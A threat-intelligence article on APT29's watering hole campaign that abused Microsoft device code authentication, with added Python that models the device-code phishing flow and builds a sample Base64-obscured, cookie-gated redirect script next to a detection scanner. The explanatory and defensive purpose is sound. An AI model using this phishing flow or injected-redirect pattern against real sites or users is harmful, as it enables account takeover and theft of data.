
Amazon disrupts APT29 watering hole attack using Microsoft Device Code Authentication

On Friday, Amazon reported that it had identified and disrupted an opportunistic watering hole campaign run by the Russia-linked APT29 group for intelligence gathering. According to Amazon’s Chief Information Security Officer, C.J. Moses, the campaign used compromised websites to redirect visitors to malicious infrastructure designed to trick them into authorising attacker-controlled devices through Microsoft’s device code authentication flow. APT29, also tracked as BlueBravo, Cloaked Ursa, CozyLarch, Cozy Bear, Earth Koshchei, ICECAP, Midnight Blizzard, and The Dukes, is a state-sponsored group attributed to Russia’s Foreign Intelligence Service (SVR). The group was recently linked to attacks that used malicious Remote Desktop Protocol (RDP) configuration files to target Ukrainian entities and exfiltrate sensitive data.

Since the beginning of the year, APT29 has employed various phishing techniques, including device code phishing and device join phishing, to gain unauthorised access to Microsoft 365 accounts. In June 2025, Google observed a threat cluster affiliated with APT29 that weaponised a Google account feature called application-specific passwords to access victims’ emails, a campaign attributed to UNC6293. The latest activities identified by Amazon’s threat intelligence team highlight APT29’s ongoing efforts to harvest credentials and gather intelligence while refining their tactics. C.J. Moses noted that this opportunistic approach demonstrates APT29’s evolution in expanding their operations for broader intelligence collection.
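To make the device code phishing mechanism concrete, the following is an added example (not Amazon's, Microsoft's or APT29's code): an offline model of the OAuth 2.0 device authorization grant (RFC 8628), the flow Microsoft's device login page implements. The point it demonstrates is that the party who requests the code, not the person who types it, receives the token. Endpoint names, the code format, the 900-second lifetime, the polling interval and the `login.example` verification URL are assumptions modelled on the RFC, not Microsoft's actual values.

```python
# Added example (not Amazon's or Microsoft's code): a minimal, offline model of the
# OAuth 2.0 device authorization grant (RFC 8628) showing why device code phishing
# works. The attacker requests the code; the victim only types it into the genuine
# verification page; the token is then handed to whoever holds the matching
# device_code. Endpoint names, code format, lifetime and interval are assumptions.
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

# Assumption: 9-character user codes from an unambiguous alphabet, split for readability.
USER_CODE_ALPHABET = "BCDFGHJKLMNPQRSTVWXZ23456789"


@dataclass
class PendingGrant:
    device_code: str      # long secret, known only to the client that asked for it
    user_code: str        # short code shown to a human
    client_id: str
    scope: str
    expires_at: float
    authorized_by: Optional[str] = None  # UPN of whoever consented on the verification page


class AuthorizationServer:
    """The three steps of the device flow; 'now' is passed in so runs are deterministic."""

    def __init__(self, lifetime_s: int = 900, interval_s: int = 5):
        self.lifetime_s = lifetime_s
        self.interval_s = interval_s
        self._by_device: Dict[str, PendingGrant] = {}
        self._by_user: Dict[str, PendingGrant] = {}

    def device_authorization(self, client_id: str, scope: str, now: float) -> dict:
        """POST /devicecode: called by the party that wants a token (in the phish, the attacker)."""
        raw = "".join(secrets.choice(USER_CODE_ALPHABET) for _ in range(9))
        grant = PendingGrant(
            device_code=secrets.token_urlsafe(32),
            user_code=f"{raw[:4]}-{raw[4:]}",
            client_id=client_id,
            scope=scope,
            expires_at=now + self.lifetime_s,
        )
        self._by_device[grant.device_code] = grant
        self._by_user[grant.user_code] = grant
        return {
            "device_code": grant.device_code,
            "user_code": grant.user_code,
            "verification_uri": "https://login.example/devicelogin",  # assumption: stand-in URL
            "expires_in": self.lifetime_s,
            "interval": self.interval_s,
        }

    def user_authorizes(self, user_code: str, upn: str, now: float) -> bool:
        """The verification page: a signed-in user types a code and clicks Continue.
        The server checks only that the code exists, is unexpired and unused;
        nothing ties the code to the user who types it."""
        grant = self._by_user.get(user_code)
        if grant is None or now > grant.expires_at or grant.authorized_by is not None:
            return False
        grant.authorized_by = upn
        return True

    def token(self, device_code: str, now: float) -> dict:
        """POST /token with grant_type=urn:ietf:params:oauth:grant-type:device_code,
        polled by the client that holds device_code."""
        grant = self._by_device.get(device_code)
        if grant is None:
            return {"error": "invalid_grant"}
        if now > grant.expires_at:
            return {"error": "expired_token"}
        if grant.authorized_by is None:
            return {"error": "authorization_pending"}
        # Token format is a placeholder; what matters is whose identity it carries.
        return {"access_token": f"tok.{grant.authorized_by}.{grant.scope}", "token_type": "Bearer",
                "upn": grant.authorized_by, "scope": grant.scope}


def run_device_code_phish(victim_upn: str, victim_enters_code_at: float, poll_at: float) -> dict:
    """One watering-hole victim: the attacker requests a code at t=0, the lure page shows
    user_code, the victim types it at victim_enters_code_at, the attacker polls at poll_at."""
    server = AuthorizationServer()
    attacker = server.device_authorization("attacker-registered-client", "Mail.Read offline_access", now=0.0)
    # All the lure has to show the victim is the short code and the genuine verification URL.
    lure = {"code": attacker["user_code"], "url": attacker["verification_uri"]}
    consented = server.user_authorizes(lure["code"], victim_upn, now=victim_enters_code_at)
    result = server.token(attacker["device_code"], now=poll_at)
    return {"consented": consented, "token_response": result}


if __name__ == "__main__":
    print(run_device_code_phish("victim@example.com", victim_enters_code_at=60.0, poll_at=65.0))
    print(run_device_code_phish("victim@example.com", victim_enters_code_at=1200.0, poll_at=1205.0))
```

With the victim entering the code 60 seconds in, the attacker's next poll returns a bearer token carrying the victim's identity and the attacker-chosen scope. With the victim arriving after the assumed 900-second lifetime, consent fails and the poll returns `expired_token`, which is why lure pages mint a fresh code per visitor rather than hard-coding one. On the defensive side, Entra ID Conditional Access can block the device code flow outright for users who have no need of it through its authentication flows condition, and sign-in logs record the protocol used, so device code sign-ins from users who never run CLI tools are a hunting lead.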

In the attacks, APT29 compromised legitimate websites and injected JavaScript that redirected roughly 10% of visitors to actor-controlled domains such as findcloudflare[.]com, which mimicked Cloudflare verification pages to appear legitimate. The goal was to get victims to enter a device code into Microsoft’s genuine device login page. The code is legitimate in the sense that Microsoft issued it, but it was issued to a client the attacker controls: once the victim approves it, the attacker’s client receives a token for the victim’s Microsoft account and data. Because the page the victim signs in on is the real one, checking the URL or the certificate does not help; the only user-facing tell is being asked to enter a code the user did not generate. Microsoft and Volexity both documented this technique in February 2025. The activity is notable for its evasion techniques: Base64 encoding to obscure the injected code, cookies set so the same visitor is not redirected twice, and moving to new infrastructure when blocked. Even after the actor migrated off AWS to another cloud provider, Amazon’s team continued to track and disrupt the operation, and subsequently observed it registering further domains such as cloudflare.redirectpartners[.]com that again tried to lure victims into Microsoft device code authentication.
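The redirect gating and the Base64 obfuscation described above are worth seeing in working form, both to understand why a single fetch of a compromised page usually shows nothing and to pull the lure domain out of an injected script. The following is an added example, not code from Amazon's report or from the actor: it models the injected script's decision logic and provides a small scanner that decodes Base64 literals found in `<script>` bodies. The cookie name `cf_chk`, the `/verify` path, the script body and the sample HTML are constructed for illustration; only the defanged domain findcloudflare[.]com and the roughly 10% sampling rate come from the report.

```python
# Added example (not from Amazon's report): a model of the injected redirect's gating
# plus a scanner that surfaces Base64-obscured redirect targets in page HTML.
# Cookie name, path, script body and sample page are constructed; only the domain
# and the ~10% rate come from the report.
import base64
import random
import re
from typing import List, Optional

LURE = "https://findcloudflare[.]com/verify"   # defanged domain from the report; path is an assumption
MARK_COOKIE = "cf_chk=1"                        # assumed cookie the script sets to avoid repeat redirects
SAMPLE_RATE = 0.10                              # report: roughly 10% of visitors were redirected


def injected_redirect_decision(cookie_header: str, draw: float,
                               target: str = LURE, rate: float = SAMPLE_RATE) -> Optional[str]:
    """Gating logic of the injected script: redirect only unmarked visitors who fall into
    the sampled fraction. Returns the target URL or None. 'draw' stands in for Math.random()."""
    if MARK_COOKIE in cookie_header:
        return None
    if draw >= rate:
        return None
    return target


def simulate_visitors(n: int, seed: int = 7) -> dict:
    """First visit from n cookie-less browsers, then a second visit from each with the mark set."""
    rng = random.Random(seed)
    first = sum(1 for _ in range(n) if injected_redirect_decision("", rng.random()) is not None)
    second = sum(1 for _ in range(n) if injected_redirect_decision(MARK_COOKIE, rng.random()) is not None)
    return {"first_visit_fraction": first / n, "second_visit_redirects": second}


# Scanner side: find quoted Base64 blobs inside <script> bodies and decode them.
_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
_B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
_REDIRECT_HINTS = ("http://", "https://", "location", "window.open", "[.]")


def find_obscured_redirects(html: str) -> List[dict]:
    """Return decoded Base64 literals from script bodies that look like redirect targets or code."""
    findings = []
    for body in _SCRIPT.findall(html):
        for literal in _B64_LITERAL.findall(body):
            try:
                decoded = base64.b64decode(literal, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue                      # not valid Base64 or not text: skip
            if not decoded.isprintable():
                continue
            hints = [h for h in _REDIRECT_HINTS if h in decoded]
            if hints:
                findings.append({"decoded": decoded, "hints": hints, "uses_atob": "atob(" in body})
    return findings


def constructed_sample_page() -> str:
    """Constructed HTML: a benign config script plus an injected script of the shape described."""
    encoded = base64.b64encode(LURE.encode()).decode()
    injected = (
        f'<script>var t=atob("{encoded}");'
        f'if(document.cookie.indexOf("{MARK_COOKIE}")<0&&Math.random()<{SAMPLE_RATE}){{'
        f'document.cookie="{MARK_COOKIE};path=/;max-age=86400";location.href=t;}}</script>'
    )
    benign = '<script>window.cfg={"theme":"dark","build":"2025.08.29"};</script>'
    return f"<html><head>{benign}</head><body><h1>Hello</h1>{injected}</body></html>"


if __name__ == "__main__":
    print(find_obscured_redirects(constructed_sample_page()))
    print(simulate_visitors(10000))
```

Two practical consequences follow from the simulation. A crawler or analyst fetching the page once hits the redirect only about one time in ten, and a browser that has already been marked never sees it again, so reproduction needs several fetches with cookies cleared between them. The scanner sidesteps that entirely: it does not need to trigger the redirect, because the decoded literal is the lure domain itself, which is the indicator to pivot on.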
